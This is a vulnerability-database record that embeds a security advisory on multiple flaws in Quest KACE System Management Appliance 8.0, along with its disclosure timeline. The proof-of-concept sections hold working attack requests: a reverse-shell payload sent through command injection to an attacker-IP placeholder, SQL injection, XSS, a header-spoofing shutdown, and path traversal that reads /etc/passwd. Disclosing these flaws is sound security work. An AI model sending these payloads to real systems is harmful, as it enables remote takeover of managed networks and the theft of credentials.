Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. 
Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. 
\n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11141",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15643",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11141",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"id": "VAR-201805-0601",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
}
]
},
"last_update_date": "2023-12-18T12:01:57.795000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementVirtualAppliance path traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137671"
},
{
"title": "Quest KACE System Management Virtual Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81225"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.683000",
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"date": "2018-06-29T18:52:01.480000",
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"date": "2018-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Virtual Appliance Path Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
],
"trust": 0.6
}
}
VAR-201805-0596
Vulnerability from variot - Updated: 2023-12-18 12:01 The 'orgID' parameter received by the '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, a blind time-based type). Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends on each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue that runs with root privileges and only allows a set of commands.
One of the available commands allows changing any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
